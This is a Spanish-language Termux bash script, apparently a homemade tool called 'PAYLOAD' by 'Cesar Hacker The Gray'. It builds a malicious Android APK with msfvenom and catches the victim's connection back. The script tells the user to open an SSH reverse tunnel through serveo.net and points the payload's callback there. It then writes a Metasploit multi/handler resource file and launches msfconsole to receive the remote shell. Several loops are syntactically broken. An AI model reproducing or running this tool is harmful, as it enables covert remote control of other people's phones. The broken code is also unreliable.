#!/data/data/com.termux/files/usr/bin/bash                              set -euo pipefail                                                       IFS=$'\n\t'
trap ctrl_c 2                                                          

# VAR
        R='\033[1;31m'
        G='\033[1;32m'                                                          Y='\033[1;33m'
        B='\033[1;34m'
        M='\033[1;35m'
        C='\033[1;36m'
        W='\033[0m'
	clear
printf "$M"
	echo "     ____   _  __   ___     ___    _    ____"
	echo "    |  _ \ / \ \ \ / / |   / _ \  / \  |  _ "
	echo "    | |_) / _ \ \ V /| |  | | | |/ _ \ | | | |"
	echo "    |  __/ ___ \ | | | |__| |_| / ___ \| |_| |"
	echo "    |_| /_/   \_\_ | |_____\___/_/   \_\____/"
printf "$Y       V 0.2.1       $G Cesar Hacker The Gray"
echo
printf "$C [Cesar]$R Bamos a crear nuestro payload$W"                                                                                           printf "$C [Set]$R PAYLOAD$Y"                                                   while read -p " >> " PAYLOAD && [ -z $PAYLOAD ];              	 printf "\n $B
 [Gray] Beamos los requisitos 
                $W \n"

	
                                                                                                                                                printf "$C [Set]$Y LOCAL HOST$G"
        while read -p " >> " LHOST && [ -z $LHOST ]; do
                printf "\n $R
                [Gray] porfavor pon un IP [HOST]
                $W \n"
        done

printf "$C [Set]$Y LOCAL PORT$G"
        while read -p " >> " LPORT && [ -z $LPORT ]; do
                printf "\n $R
                [Gray] porfavor pon un puerto [LPORT]
                $W \n"
        done

printf "$C [Set]$Y nombre$G"
        while read -p " >> " MYAPK && [ -z $MYAPK ]; do
                printf "\n $R
                [Gray] nesesitamos un nuevo nombre de la apk
                $W \n"
        done

sleep 1

printf "$C [Set]$Y PAYLOAD$G"
        while read -p " >> " PAYLOAD && [ -z $PAYLOAD ]; do
                printf "\n $R
                [Gra] porfavor pon el tipo de Payload                                   $W \n"
	done


sleep 1

printf "$C [Set]$Y Puerto 5 dijitos$G"
        while read -p " >> " SSH && [ -z $SSH ]; do                          printf "\n $R                                                           [Gray] porfavor pon un puerto de 5 dijitos   
	$W \n" 
        
	done

printf "$C [Set]$Y Puerto 5 dijitoss$G"                                       while read -p " >> " SSH && [ -z $SSH ];                                  printf "\n $R                                                           [Gray] porfavor coloca un puerto de 5 dijitos                            $W \n"                                                               
		clear
echo 
echo
		clear
echo
printf "$C"
	echo "                __"
	echo " _ __ ___  ___ / _|_   _____ _ __   ___  _ __ ___"
	echo "|  _   _ \/ __| |_\ \ / / _ \  _ \ / _ \|  _   _ "
	echo "| | | | | \__ \  _|\ V /  __/ | | | (_) | | | | | |"
	echo "|_| |_| |_|___/_|   \_/ \___|_| |_|\___/|_| |_| |_|"
printf "$Y        Cesar Hacker The Gray"
echo
printf "$C Pega esto en otra ventana ( ssh -R $LPORT:$LHOST:$SSH serveo.net)"
echo
echo
mkdir -p /sdcard/PAYLOAD
printf "$G"

msfvenom -p $PAYLOAD LHOST=serveo.net LPORT=$SSH R > /sdcard/PAYLOAD/$MYAPK



printf "$C la apk se guardo en tu  memoria interna en una carpeta llamada PAYPOAD"
printf "$Y          presiona en enter para continuar"
        read enter
	clear
printf "$R"
	echo " _     _   _  ___  ____ _____     _     ____   ___  ____ _____"
	echo "| |   | | | |/ _ \/ ___|_   _|   | |   |  _ \ / _ \|  _ \_   _|"
	echo "| |   | |_| | | | \___ \ | |_____| |   | |_) | | | | |_) || |"
	echo "| |___|  _  | |_| |___) || |_____| |___|  __/| |_| |  _ < | |"
	echo "|_____|_| |_|\___/|____/ |_|     |_____|_|    \___/|_| \_\|_|"
echo
printf "$C [Set]$G LOCAL HOST $Y>> $LHOST"
echo
printf "$C [Set]$G LOCAL PORT$Y"
                while read -p " >> " LPORT && [ -z $LPORT ]; do
                        printf "\n $R                                                           [Gra] porfavor coloca un puerto
                        $W \n"
		done
printf "                $C Press$Y enter$C to continue$W"
        read enter
		clear
printf "$C"
	echo " __  __      _                  _       _ _"
	echo "|  \/  | ___| |_ __ _ ___ _ __ | | ___ (_) |_"
	echo "| |\/| |/ _ \ __/ _  / __|  _ \| |/ _ \| | __|"
	echo "| |  | |  __/ || (_| \__ \ |_) | | (_) | | |_"
	echo "|_|  |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|"
	echo "      v 4.17             |_|"
printf "$Y          Cesar Hacker The Gray"
        echo
        printf "$C [Cesar]$G Inisiamos metasploit con esta comfigurasion
        "
        sleep 1
        printf "$Y [!]$C PAYLOAD =$R $PAYLOAD \n"
        printf "$Y         [!]$C LHOST   =$R $LHOST \n"
        printf "$Y         [!]$C LPORT   =$R $LPORT \n"
        echo                                                            
	echo
        echo
        printf "$C [Gray]$R explotando.... $Y msfconsole . . .$W"
        echo
	touch $HOME/Red/Cesar/$MYAPK.rc
        echo "use exploit/multi/handler" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set PAYLOAD $PAYLOAD" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set LHOST $LHOST" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "set LPORT $LPORT" >> $HOME/Red/Cesar/$MYAPK.rc
        echo "run" >> $HOME/Red/Cesar/$MYAPK.rc
        chmod 777 $HOME/Red/Cesar/$MYAPK.rc
        echo "
        "
        msfconsole -q -r $HOME/Red/Cesar/$MYAPK.rc





